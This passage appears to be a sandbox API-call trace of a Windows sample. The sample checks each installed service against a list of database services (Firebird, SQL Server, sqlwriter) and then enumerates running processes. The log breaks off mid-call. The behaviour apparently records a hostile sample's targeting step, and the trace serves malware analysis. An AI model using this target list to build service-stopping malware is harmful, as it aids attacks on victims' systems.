lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0167.034] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0167.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0167.034] lstrlenW (lpString="KeyIso") returned 6 [0167.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0167.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0167.034] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0167.035] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0167.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0167.035] lstrlenW (lpString="LanmanServer") returned 12 [0167.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0167.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0167.035] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0167.035] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0167.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0167.035] lstrlenW (lpString="LanmanWorkstation") returned 17 [0167.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0167.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0167.035] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0167.035] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0167.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0167.035] lstrlenW (lpString="lfsvc") returned 5 [0167.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0167.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0167.035] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0167.035] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0167.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0167.035] lstrlenW (lpString="lmhosts") returned 7 [0167.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0167.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0167.035] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0167.035] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0167.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0167.035] lstrlenW (lpString="LSM") returned 3 [0167.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0167.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0167.036] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0167.036] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0167.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0167.036] lstrlenW (lpString="MpsSvc") returned 6 [0167.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0167.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0167.036] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0167.036] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0167.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0167.036] lstrlenW (lpString="NcbService") returned 10 [0167.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0167.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0167.036] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0167.036] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0167.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0167.036] lstrlenW (lpString="netprofm") returned 8 [0167.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0167.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0167.036] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0167.036] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0167.036] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0167.036] lstrlenW (lpString="NlaSvc") returned 6 [0167.036] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0167.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0167.036] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0167.036] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0167.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0167.037] lstrlenW (lpString="nsi") returned 3 [0167.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0167.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0167.037] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0167.037] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0167.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0167.037] lstrlenW (lpString="PcaSvc") returned 6 [0167.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0167.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0167.037] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0167.037] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0167.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0167.037] lstrlenW (lpString="PlugPlay") returned 8 [0167.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0167.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0167.037] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0167.037] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0167.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0167.037] lstrlenW (lpString="Power") returned 5 [0167.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0167.037] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0167.037] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0167.037] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0167.037] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0167.037] lstrlenW (lpString="ProfSvc") returned 7 [0167.037] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0167.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0167.038] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0167.038] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0167.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0167.038] lstrlenW (lpString="RpcEptMapper") returned 12 [0167.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0167.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0167.038] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0167.038] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0167.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0167.038] lstrlenW (lpString="RpcSs") returned 5 [0167.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0167.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0167.038] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0167.038] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0167.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0167.038] lstrlenW (lpString="SamSs") returned 5 [0167.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0167.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0167.038] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0167.038] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0167.038] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0167.038] lstrlenW (lpString="Schedule") returned 8 [0167.038] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0167.038] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0167.038] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0167.038] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0167.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0167.039] lstrlenW (lpString="SecurityHealthService") returned 21 [0167.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0167.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0167.039] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0167.039] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0167.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0167.039] lstrlenW (lpString="SENS") returned 4 [0167.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0167.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0167.039] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0167.039] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0167.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0167.039] lstrlenW (lpString="ShellHWDetection") returned 16 [0167.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0167.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0167.039] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0167.039] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0167.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0167.039] lstrlenW (lpString="Spooler") returned 7 [0167.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0167.039] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0167.039] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0167.039] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0167.039] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0167.039] lstrlenW (lpString="sppsvc") returned 6 [0167.039] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0167.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0167.040] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0167.040] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0167.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0167.040] lstrlenW (lpString="SSDPSRV") returned 7 [0167.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0167.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0167.040] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0167.040] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0167.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0167.040] lstrlenW (lpString="StateRepository") returned 15 [0167.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0167.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0167.040] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0167.040] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0167.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0167.040] lstrlenW (lpString="SysMain") returned 7 [0167.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0167.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0167.040] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0167.040] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0167.040] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0167.040] lstrlenW (lpString="SystemEventsBroker") returned 18 [0167.040] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0167.040] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0167.040] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0167.040] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0167.578] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x800060 | out: hHeap=0x710000) returned 1 [0167.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ec [0167.587] Process32FirstW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.587] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0167.588] lstrlenW (lpString="System") returned 6 [0167.588] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0167.589] lstrlenW (lpString="smss.exe") returned 8 [0167.589] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.589] lstrlenW (lpString="csrss.exe") returned 9 [0167.589] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0167.590] lstrlenW (lpString="wininit.exe") returned 11 [0167.590] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.590] lstrlenW (lpString="csrss.exe") returned 9 [0167.590] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0167.591] lstrlenW (lpString="winlogon.exe") returned 12 [0167.591] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0167.591] lstrlenW (lpString="services.exe") returned 12 [0167.591] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0167.592] lstrlenW (lpString="lsass.exe") returned 9 [0167.592] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.592] lstrlenW (lpString="svchost.exe") returned 11 [0167.592] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0167.593] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0167.593] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0167.593] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0167.593] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.594] lstrlenW (lpString="svchost.exe") returned 11 [0167.594] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0167.595] lstrlenW (lpString="dwm.exe") returned 7 [0167.595] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x61, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.595] lstrlenW (lpString="svchost.exe") returned 11 [0167.595] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.596] lstrlenW (lpString="svchost.exe") returned 11 [0167.596] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.596] lstrlenW (lpString="svchost.exe") returned 11 [0167.596] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.597] lstrlenW (lpString="svchost.exe") returned 11 [0167.597] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.597] lstrlenW (lpString="svchost.exe") returned 11 [0167.597] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.598] lstrlenW (lpString="svchost.exe") returned 11 [0167.598] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.598] lstrlenW (lpString="svchost.exe") returned 11 [0167.598] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.599] lstrlenW (lpString="svchost.exe") returned 11 [0167.599] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.599] lstrlenW (lpString="svchost.exe") returned 11 [0167.600] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.600] lstrlenW (lpString="svchost.exe") returned 11 [0167.600] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0167.601] lstrlenW (lpString="spoolsv.exe") returned 11 [0167.601] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.601] lstrlenW (lpString="svchost.exe") returned 11 [0167.601] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0167.602] lstrlenW (lpString="audiodg.exe") returned 11 [0167.602] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0167.603] lstrlenW (lpString="sihost.exe") returned 10 [0167.603] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.603] lstrlenW (lpString="svchost.exe") returned 11 [0167.603] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0167.604] lstrlenW (lpString="taskhostw.exe") returned 13 [0167.604] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.604] lstrlenW (lpString="explorer.exe") returned 12 [0167.604] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0167.605] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0167.605] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0167.605] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0167.605] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0167.606] lstrlenW (lpString="Memory Compression") returned 18 [0167.606] Process32NextW (in: hSnapshot=0x2ec, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0167.606] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0167.606] Process32NextW (in: 